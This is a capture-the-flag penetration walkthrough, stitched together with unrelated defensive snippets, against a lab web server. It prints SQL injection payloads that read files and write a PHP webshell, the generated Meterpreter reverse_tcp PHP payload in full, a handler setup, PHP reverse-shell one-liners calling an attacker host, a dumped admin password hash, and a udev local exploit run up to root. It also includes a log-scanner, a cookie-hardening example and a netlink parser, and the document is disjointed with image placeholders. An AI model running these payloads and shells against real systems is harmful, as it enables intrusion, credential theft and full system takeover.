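172.16.70.122 - - [30/Nov/2021:23:52:09 +0800] "GET /index.php?id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual HTTP/1.1" 200 9811 "-" "Mozilla/5.0"
172.16.70.122 - - [30/Nov/2021:23:53:41 +0800] "GET /index.php?id=1%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[%27cmd%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27 HTTP/1.1" 200 4010 "-" "Mozilla/5.0"
172.16.70.122 - - [30/Nov/2021:23:54:02 +0800] "GET /actions/login.php?action=../../../../etc/passwd%00 HTTP/1.1" 200 2231 "-" "Mozilla/5.0"
172.16.70.122 - - [30/Nov/2021:23:54:30 +0800] "GET /index.php?id=4%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [30/Nov/2021:23:55:00 +0800] "GET /index.php?action=login HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

# Apache combined log: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Each rule is evaluated against the fully URL-decoded request target.
RULES = [
    ("sqli-union", re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)),
    ("mysql-file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("mysql-file-write", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("time-based-sqli", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("php-code-in-request", re.compile(r"<\?php", re.I)),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("lfi-null-byte", re.compile("\x00")),   # %00 after decoding
]


def decode_target(target):
    """URL-decode twice so that double-encoded payloads (%2500 -> %00 -> NUL)
    are also normalised before matching."""
    return unquote(unquote(target))


def classify(target):
    """Return the sorted list of rule names that match one request target."""
    decoded = decode_target(target)
    return sorted(name for name, rx in RULES if rx.search(decoded))


def scan_log(text):
    """Parse every log line and return a finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line, skip
        rules = classify(m.group("target"))
        if rules:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "rules": rules,
            })
    return findings


def count_by_rule(findings):
    """Aggregate findings into {rule name: hit count} for a quick summary."""
    counts = {}
    for f in findings:
        for r in f["rules"]:
            counts[r] = counts.get(r, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["ts"], ",".join(f["rules"]), f["target"][:60])
    print(count_by_rule(scan_log(SAMPLE_LOG)))
```

The NUL rule is the cheap one: a literal %00 has no legitimate place in a query string, so it is worth alerting on by itself even when no traversal sequence accompanies it. The UNION rule is deliberately loose (anything between `union` and `select`) and will need tuning on applications whose own URLs contain those words.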


msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.122 LPORT=4444 -o shell.php
                                                                                                             

┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.122 LPORT=4444 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php

                                                                                                                                                                          
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ ls                                                                                                                                                                       2 ⨯
shell.php
                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ cat shell.php    
/*<?php /**/ error_reporting(0); $ip = '172.16.70.122'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();  


Upload the shell

 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin  
 
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost <Kali's IP>
exploit

http://172.16.70.141/files/shell.php

after uploading darkshell

uname -a
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux 


cat /etc/passwd | grep apache

apache:x:48:48:Apache:/var/www:/sbin/nologin 

cat /etc/redhat-release
cat /etc/redhat-release
CentOS release 5.2 (Final) 

download netcat
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
--2021-12-19 23:14:15--  https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
正在解析主机 sourceforge.net (sourceforge.net)... 204.68.111.105
正在连接 sourceforge.net (sourceforge.net)|204.68.111.105|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 301 Moved Permanently
位置:https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/ [跟随至新的 URL]
--2021-12-19 23:14:16--  https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/
再次使用存在的到 sourceforge.net:443 的连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/download [跟随至新的 URL]
--2021-12-19 23:14:16--  https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/download
再次使用存在的到 sourceforge.net:443 的连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm?ts=gAAAAABhv0xJOhKpxTJf8OxAINxwfaWxs7qCrIsOXuFZy8CuhDfSRg1vOqcRdAD0-HyAJw5OCAnbKMabLNncISYHhst5Pp7JYg%3D%3D&use_mirror=udomain&r= [跟随至新的 URL]
--2021-12-19 23:14:17--  https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm?ts=gAAAAABhv0xJOhKpxTJf8OxAINxwfaWxs7qCrIsOXuFZy8CuhDfSRg1vOqcRdAD0-HyAJw5OCAnbKMabLNncISYHhst5Pp7JYg%3D%3D&use_mirror=udomain&r=
正在解析主机 downloads.sourceforge.net (downloads.sourceforge.net)... 204.68.111.105
正在连接 downloads.sourceforge.net (downloads.sourceforge.net)|204.68.111.105|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://udomain.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm [跟随至新的 URL]
--2021-12-19 23:14:18--  https://udomain.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
正在解析主机 udomain.dl.sourceforge.net (udomain.dl.sourceforge.net)... 203.135.147.10
正在连接 udomain.dl.sourceforge.net (udomain.dl.sourceforge.net)|203.135.147.10|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:123912 (121K) [application/octet-stream]
正在保存至: “netcat-0.7.1-1.i386.rpm”

netcat-0.7.1-1.i386.rpm         100%[====================================================>] 121.01K   296KB/s  用时 0.4s    

2021-12-19 23:14:20 (296 KB/s) - 已保存 “netcat-0.7.1-1.i386.rpm” [123912/123912])

                                                                                                                             
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ 




rpm -Uvh netcat-0.7.1-1.i386.rpm



                                                                                                                                                                                
┌──(root💀kwkl)-[/opt/w3af-master/extras/docker]
└─# searchsploit Linux udev  
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                 |  Path
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)                                                  | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)                                                     | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                                     | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)                                                                  | linux/local/21848.rb
QEMU - Denial of Service                                                                                                                       | linux/dos/47320.c
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
                                                                                                                                                                                 
┌──(root💀kwkl)-[/opt/w3af-master/extras/docker]
└─# 

chmod +x 8478.sh

-rwxr-xr-x 1 apache apache 3.3K Nov 28 16:26 8478.sh 

View the PIDs and state of the kernel and user-space netlink sockets: cat /proc/net/netlink

sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
cfebce00 0   0      00000000 0        0        00000000 2
cf830e00 0   3198   00000111 0        0        00000000 2
cfc5fa00 6   0      00000000 0        0        00000000 2
cfe78600 7   0      00000000 0        0        00000000 2
cf83b800 9   2528   00000000 0        0        00000000 2
cfe66e00 9   0      00000000 0        0        00000000 2
cf557c00 10  0      00000000 0        0        00000000 2
cf513c00 11  0      00000000 0        0        00000000 2
cfc5f400 15  569    ffffffff 0        0        00000000 2
cfebcc00 15  0      00000000 0        0        00000000 2
cf513a00 16  0      00000000 0        0        00000000 2
cf6b7c00 18  0      00000000 0        0        00000000 2

./8478.sh


/tmp/udev 569

./udev 568





image-20211218231156549

image-20211218231447834

image-20211218231544621

image-20211218231837541

Modifying the cookie gives a nice surprise

[
{
"name": "roundcube_sessid",
"value": "n0f29i2hp5kv4ncg94fkrgga33",
"domain": "172.16.70.141",
"hostOnly": true,
"path": "/",
"secure": false,
"httpOnly": false,
"sameSite": "no_restriction",
"session": true,
"firstPartyDomain": "",
"storeId": null
},
{
"name": "logged_in",
"value": "1",
"domain": "172.16.70.141",
"hostOnly": true,
"path": "/",
"secure": false,
"httpOnly": false,
"sameSite": "no_restriction",
"session": true,
"firstPartyDomain": "",
"storeId": null
},
{
"name": "hash",
"value": "25e4ee4e9229397b6b17776bfceaf8e7",
"domain": "172.16.70.141",
"hostOnly": true,
"path": "/",
"secure": false,
"httpOnly": false,
"sameSite": "no_restriction",
"session": true,
"firstPartyDomain": "",
"storeId": null
},
{
"name": "PHPSESSID",
"value": "vseftoonmq1vrd6vt4v1pb29s4",
"domain": "172.16.70.141",
"hostOnly": true,
"path": "/",
"secure": false,
"httpOnly": false,
"sameSite": "no_restriction",
"session": true,
"firstPartyDomain": "",
"storeId": null
},
{
"name": "user_id",
"value": "1",
"domain": "172.16.70.141",
"hostOnly": true,
"path": "/",
"secure": false,
"httpOnly": false,
"sameSite": "no_restriction",
"session": true,
"firstPartyDomain": "",
"storeId": null
}
]
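Why a copied cookie is enough here: the auth check in index.php (dumped via load_file above) only asks whether a row with the cookie's user_id and the cookie's hash exists, and the hash cookie is the stored md5 of the password, so the database dump alone yields a valid session. As an added example (not code from the writeup or from the target application), the Python below re-implements that check against a constructed one-row user table and contrasts it with an HMAC-signed, expiring session cookie that cannot be forged from leaked database contents. SERVER_SECRET and the cookie layout are my own assumptions.

```python
import hashlib
import hmac
import time

# Constructed user table, modelled on the row dumped in this writeup:
# user_id 1, username admin, user_password = md5('adminpass').
ADMIN_HASH = hashlib.md5(b"adminpass").hexdigest()
USERS = {1: {"username": "admin", "password_md5": ADMIN_HASH}}


def legacy_is_admin(cookies):
    """Re-implements the check in the target's index.php: the browser sends
    user_id and hash cookies and the server only asks whether a row with that
    id and that stored hash exists.  Whoever knows the stored hash (for
    instance from a database dump) is accepted without ever knowing the
    password.  (The original also interpolates user_id straight into SQL;
    here it is parsed as an int, which is the minimal fix for that part.)"""
    try:
        uid = int(cookies.get("user_id", ""))
    except ValueError:
        return False
    user = USERS.get(uid)
    return user is not None and cookies.get("hash") == user["password_md5"]


# Hardened scheme.  Assumption: a per-deployment secret that never leaves the
# server, so nothing in the database lets a client compute a valid signature.
SERVER_SECRET = b"constructed-secret-rotate-in-production"


def _sign(payload):
    return hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()


def issue_session_cookie(user_id, now=None, ttl=3600):
    """Cookie layout (assumed): user_id:expiry:HMAC-SHA256(secret, user_id:expiry)."""
    now = int(time.time() if now is None else now)
    payload = f"{user_id}:{now + ttl}"
    return f"{payload}:{_sign(payload)}"


def verify_session_cookie(cookie, now=None):
    """Return the user_id if the signature is valid and the cookie has not
    expired, otherwise None.  compare_digest avoids timing leaks."""
    now = int(time.time() if now is None else now)
    parts = cookie.split(":")
    if len(parts) != 3 or not parts[0].isdigit() or not parts[1].isdigit():
        return None
    uid, exp, sig = parts
    if not hmac.compare_digest(sig, _sign(f"{uid}:{exp}")):
        return None
    if int(exp) < now:
        return None
    return int(uid)


if __name__ == "__main__":
    # Cookie values replayed from the dump are accepted by the legacy check...
    print(legacy_is_admin({"user_id": "1", "hash": ADMIN_HASH}))
    # ...while the signed cookie must come from the server and dies on tamper.
    c = issue_session_cookie(1)
    print(verify_session_cookie(c), verify_session_cookie("2:" + c.split(":", 1)[1]))
```

Pair the signed cookie with the HttpOnly and Secure flags (both false in the cookie dump above) and with server-side invalidation on logout; a signed cookie stops forgery, but on its own it still does not revoke a captured one before it expires.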

image-20211219001945520

image-20211219004210534

Use the one-line shell to upload a full-featured webshell (大马)

Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux

image-20211219004914251 (https://gitee.com/hashk8/hash32picgo/raw/master/imgs/image-20211219004914251.png)

image-20211219231531388

php -v

image-20211226105229326

php -r '$sock=fsockopen("192.168.32.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("172.16.70.122",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

image-20211226105351182

Got a shell

nc -vvlp 4444

php -r '$sock=fsockopen("172.16.70.122",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

image-20211226110456160

image-20211226105425084

image-20211226105449690

image-20211226105646895

sh-3.2$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
cfebce00 0   0      00000000 0        0        00000000 2
cf830e00 0   3198   00000111 0        0        00000000 2
cfc5fa00 6   0      00000000 0        0        00000000 2
cfe78600 7   0      00000000 0        0        00000000 2
cf83b800 9   2528   00000000 0        0        00000000 2
cfe66e00 9   0      00000000 0        0        00000000 2
cf557c00 10  0      00000000 0        0        00000000 2
cf513c00 11  0      00000000 0        0        00000000 2
cfc5f400 15  569    ffffffff 0        0        00000000 2
cfebcc00 15  0      00000000 0        0        00000000 2
cf513a00 16  0      00000000 0        0        00000000 2
cf6b7c00 18  0      00000000 0        0        00000000 2
sh-3.2$ ls

id
uid=48(apache) gid=48(apache) groups=48(apache)

./8478.sh 568
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
id
id
id
id
uid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
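The /proc/net/netlink table shown twice in this writeup (once flattened, once in the shell session) is read by eye above. As an added example (not code from the writeup), the Python below parses that table so a host audit can list which user-space processes hold netlink sockets per protocol and which are subscribed to multicast groups; the sample input is the table copied from this page, and the protocol-number names come from linux/netlink.h. The column set is taken from the header line, so the parser also works on newer kernels that append Drops and Inode columns.

```python
# Symbolic names for the Eth (protocol) column, from linux/netlink.h.
NETLINK_PROTOCOLS = {
    0: "NETLINK_ROUTE",
    6: "NETLINK_XFRM",
    7: "NETLINK_SELINUX",
    9: "NETLINK_AUDIT",
    10: "NETLINK_FIB_LOOKUP",
    11: "NETLINK_CONNECTOR",
    15: "NETLINK_KOBJECT_UEVENT",
    16: "NETLINK_GENERIC",
    18: "NETLINK_SCSITRANSPORT",
}

# /proc/net/netlink as captured on the target in this writeup (copied from the page).
SAMPLE = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
cfebce00 0   0      00000000 0        0        00000000 2
cf830e00 0   3198   00000111 0        0        00000000 2
cfc5fa00 6   0      00000000 0        0        00000000 2
cfe78600 7   0      00000000 0        0        00000000 2
cf83b800 9   2528   00000000 0        0        00000000 2
cfe66e00 9   0      00000000 0        0        00000000 2
cf557c00 10  0      00000000 0        0        00000000 2
cf513c00 11  0      00000000 0        0        00000000 2
cfc5f400 15  569    ffffffff 0        0        00000000 2
cfebcc00 15  0      00000000 0        0        00000000 2
cf513a00 16  0      00000000 0        0        00000000 2
cf6b7c00 18  0      00000000 0        0        00000000 2
"""


def parse_netlink(text):
    """Parse /proc/net/netlink into a list of dicts, one per socket.
    Column names are taken from the header so extra trailing columns on
    newer kernels are carried along without breaking the known ones."""
    lines = text.strip().splitlines()
    header = lines[0].split()
    entries = []
    for line in lines[1:]:
        fields = line.split()
        if len(fields) != len(header):
            continue  # truncated or malformed row
        row = dict(zip(header, fields))
        entries.append({
            "sk": row["sk"],
            "proto": int(row["Eth"]),
            "pid": int(row["Pid"]),            # portid; 0 = kernel-side socket
            "groups": int(row["Groups"], 16),  # multicast subscription bitmask
            "rmem": int(row["Rmem"]),
            "wmem": int(row["Wmem"]),
        })
    return entries


def proto_name(proto):
    return NETLINK_PROTOCOLS.get(proto, f"NETLINK_{proto}")


def userspace_listeners(entries, proto):
    """PIDs of user-space sockets bound to one netlink protocol."""
    return sorted(e["pid"] for e in entries if e["proto"] == proto and e["pid"] != 0)


def multicast_subscribers(entries):
    """(proto, pid, groups) for every socket subscribed to any multicast group."""
    return [(e["proto"], e["pid"], e["groups"]) for e in entries if e["groups"]]


def inventory(entries):
    """{protocol name: [user-space pids]} for a quick host-audit summary."""
    protos = sorted({e["proto"] for e in entries})
    return {proto_name(p): userspace_listeners(entries, p) for p in protos}


if __name__ == "__main__":
    for name, pids in inventory(parse_netlink(SAMPLE)).items():
        print(f"{name:24s} {pids}")
```

On a production host the same inventory is worth comparing against the expected daemons (routing daemons on NETLINK_ROUTE, auditd on NETLINK_AUDIT, the device manager on NETLINK_KOBJECT_UEVENT): an unexpected process with a wide Groups mask is a sign of something sniffing or injecting kernel events.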






Internal network penetration: got root

image-20211226110232851
